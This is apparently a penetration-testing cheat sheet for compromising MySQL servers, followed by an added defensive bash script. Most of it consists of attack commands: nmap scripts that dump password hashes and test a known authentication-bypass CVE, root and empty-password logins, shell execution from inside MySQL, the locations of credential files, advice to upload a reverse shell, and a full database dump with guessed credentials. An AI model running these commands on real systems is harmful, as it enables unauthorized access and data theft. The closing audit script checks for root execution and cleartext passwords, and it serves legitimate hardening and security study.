MySQL
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
nmap -sV -Pn -vv --script="mysql*" $ip -p 3306
If MySQL is running as root and you have access, you can run commands:
mysql> select do_system('id');
mysql> \! sh
mysql --host=$ip -u root -p
mysql -h $ip -u wpmaster@localhost -p
mysql -h $ip -u root@localhost
mysql -h $ip -u ""@localhost
telnet $ip 3306
nmap --script=mysql-enum --script-args userdb=<username lists> $ip
mysql -h $ip -P 3306
mysql -u <user> -p<password>
mysql -u root -p
- Unix
  - my.cnf
  - /etc/mysql
  - /etc/my.cnf
  - /etc/mysql/my.cnf
  - /var/lib/mysql/my.cnf
  - ~/.my.cnf
  - /etc/my.cnf
- Windows
  - config.ini
  - my.ini
  - windows\my.ini
  - winnt\my.ini
  - <InstDir>/mysql/data/
~/.mysql_history
connections.log
update.log
common.log
- You might gain access to a shell by uploading a reverse shell. You then need to escalate your privileges.
- Look into the database and see which users and passwords are available.
/var/www/html/configuration.php
mysqldump -u admin -padmin --all-databases --skip-lock-tables
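A defender-side check for two conditions this page depends on, a server configured to run as root and credentials stored in readable option files; it is an added example, not code from the original page. The finding labels, the `audit_mycnf` function name and the sample file are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): audit a MySQL option file for
# the weaknesses this page relies on. Finding labels are this example's own.

audit_mycnf() {
    local file=$1
    [ -r "$file" ] || { echo "UNREADABLE $file"; return 2; }
    awk '
        /^[ \t]*[#;]/ { next }                       # whole-line comments
        /^[ \t]*\[/ {                                # section header, e.g. [mysqld]
            sec = tolower($0)
            gsub(/[ \t]/, "", sec); sub(/^\[/, "", sec); sub(/\].*$/, "", sec)
            next
        }
        {
            line = $0
            sub(/[ \t]+#.*$/, "", line)              # trailing comment
            n = index(line, "=")
            if (n == 0) next
            key = tolower(substr(line, 1, n - 1)); val = substr(line, n + 1)
            gsub(/[ \t]/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", val)
            # mysqld refuses to start as root unless user=root is set explicitly
            if ((sec == "mysqld" || sec == "mysqld_safe") && key == "user" && val == "root")
                print "RUNS_AS_ROOT [" sec "]"
            # any stored password is readable by whoever can read the file
            if (key == "password" && val != "")
                print "CLEARTEXT_PASSWORD [" sec "]"
        }' "$file"
    # option files holding credentials should not be readable by "other"
    if [ -n "$(find "$file" -prune -perm -004 -print)" ]; then
        echo "WORLD_READABLE"
    fi
    return 0
}

# Constructed sample input, not taken from any real host.
SAMPLE_CNF='[mysqld]
user = root   # constructed: forces the daemon to run as root
port = 3306

[client]
user = wpmaster
password = example-only
'

demo_file=$(mktemp)
printf '%s' "$SAMPLE_CNF" > "$demo_file"
chmod 644 "$demo_file"
audit_mycnf "$demo_file"
rm -f "$demo_file"
```

Run it against each option file location listed above; any output line is a finding to remediate.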